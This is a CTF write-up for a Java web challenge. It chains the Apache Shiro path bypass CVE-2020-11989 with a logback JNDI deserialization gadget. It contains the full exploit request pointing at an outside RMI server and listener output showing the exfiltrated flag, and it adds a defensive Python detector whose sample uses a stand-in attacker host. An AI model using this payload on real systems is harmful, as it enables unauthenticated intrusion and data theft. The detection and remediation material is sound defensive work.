While working through the Java challenge from 强网拟态 (QWB Mimic), I realised it is essentially the same as this year's 红明谷 CTF problem, so I reproduced it on buuctf to get familiar with the attack flow before studying the technical details.
WP

The moment the page opens and shows that 500 error page, it is clearly Spring or Spring Boot (I still don't know it well; something to study properly later). Visiting /login hints at /json, and visiting /json responds with a 302 back to /login, so a login is obviously required. Try posting something:

```
username=1&password=1
```

It reports a failed login, but the response sets the cookie rememberMe=deleteMe;, so this is Shiro, and we use CVE-2020-11989 (Apache Shiro authentication bypass):
```http
POST /;/json HTTP/1.1
Host: abdae116-e772-4ce0-8860-b85dbc7f27c2.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
cookie: JSESSIonID=E00995E63A26DD274E5BAB6C330E7518
Connection: close
Content-Type: application/json
Content-Length: 98

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://121.5.169.223:1099/6dzonl"}]
```
The attack succeeds and the flag arrives on the listener:
```
root@VM-0-6-ubuntu:~# nc -lvvp 39767
Listening on [0.0.0.0] (family 0, port 39767)
Connection from 117.21.200.166 52663 received!
POST / HTTP/1.1
User-Agent: curl/7.38.0
Host: 121.5.169.223:39767
Accept: */*
Content-Length: 239
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------644113426ad92d3d

--------------------------644113426ad92d3d
Content-Disposition: form-data; name="file"; filename="flag"
Content-Type: application/octet-stream

flag{056d95fc-e903-41c0-9158-9c559701ee9c}
--------------------------644113426ad92d3d--
```
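From the defender's side, the request above shows two things worth alerting on: a `;` path-parameter segment (`/;/json`) that Shiro's filter chain and Spring's dispatcher interpret differently (CVE-2020-11989, fixed in Shiro 1.5.3), and a JSON body of the form `["fully.qualified.Class", {...}]` that names a class whose property setter performs a JNDI lookup (`ch.qos.logback.core.db.JNDIConnectionSource` with `jndiLocation`). The following Python detector is an added example written for this page, not code from the writeup or from the challenge; the sample requests, the `attacker.example` host and the gadget list (which contains only the class seen here) are constructed for illustration.

```python
import json
import re
from urllib.parse import unquote

# Constructed sample traffic modelled on the writeup: a benign GET, the
# ';'-bypass POST carrying the JNDI gadget, and a normal JSON POST.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/login", "content_type": "text/html", "body": ""},
    {"method": "POST", "path": "/;/json", "content_type": "application/json",
     "body": '["ch.qos.logback.core.db.JNDIConnectionSource",'
             '{"jndiLocation":"rmi://attacker.example:1099/x"}]'},
    {"method": "POST", "path": "/json", "content_type": "application/json",
     "body": '{"name":"alice"}'},
]

# Classes whose JSON-settable properties end in a JNDI lookup. Only the class
# from the writeup is listed; a real deployment would extend this (assumption).
JNDI_GADGET_CLASSES = {
    "ch.qos.logback.core.db.JNDIConnectionSource",
}

# URL schemes that make a JNDI lookup reach out to a remote server.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")


def has_shiro_path_bypass(path: str) -> bool:
    """Indicators for CVE-2020-11989: a ';' path parameter in any segment
    (Shiro matched '/;/json' as '/', Spring dispatched it to /json) or a
    double-encoded path ('%25..'), which Shiro and Spring also decode
    differently. The Servlet ';jsessionid=' rewrite is ignored to avoid a
    false positive on legitimate URL-rewritten sessions."""
    raw = path.split("?", 1)[0]
    if "%25" in raw.lower():
        return True
    decoded = unquote(raw)
    decoded = re.sub(r";jsessionid=[^/;]*", "", decoded, flags=re.I)
    return ";" in decoded


def find_jndi_gadget(body: str):
    """If the body is a polymorphic-typed array ["fqcn", {...}] whose class is
    a known JNDI gadget, return (class_name, remote_target_or_None);
    otherwise return None."""
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return None
    if not (isinstance(data, list) and len(data) == 2
            and isinstance(data[0], str) and isinstance(data[1], dict)):
        return None
    cls, props = data
    if cls not in JNDI_GADGET_CLASSES:
        return None
    for value in props.values():
        if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
            return cls, value
    return cls, None


def analyze_request(req: dict) -> list:
    """Return the list of finding tags for one request (empty if clean)."""
    findings = []
    if has_shiro_path_bypass(req["path"]):
        findings.append("shiro-path-bypass")
    if req.get("content_type", "").startswith("application/json"):
        hit = find_jndi_gadget(req.get("body", ""))
        if hit is not None:
            cls, target = hit
            tag = f"jndi-gadget:{cls}"
            if target:
                tag += f"->{target}"
            findings.append(tag)
    return findings


def analyze_all(reqs) -> dict:
    """Map each request path to its findings."""
    return {r["path"]: analyze_request(r) for r in reqs}


if __name__ == "__main__":
    for path, found in analyze_all(SAMPLE_REQUESTS).items():
        print(path, "->", found or "clean")
```

The path check is deliberately independent of the body check: the bypass alone tells you an unauthenticated client reached a protected controller, and the gadget body alone tells you the JSON endpoint is deserializing attacker-chosen types, which is what to fix (upgrade Shiro past 1.5.3, and stop accepting polymorphic `["class", {...}]` input or restrict it to an allow-list of types).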

![[红明谷CTF 2021]JavaWeb](http://www.mshxw.com/aiimages/31/390361.png)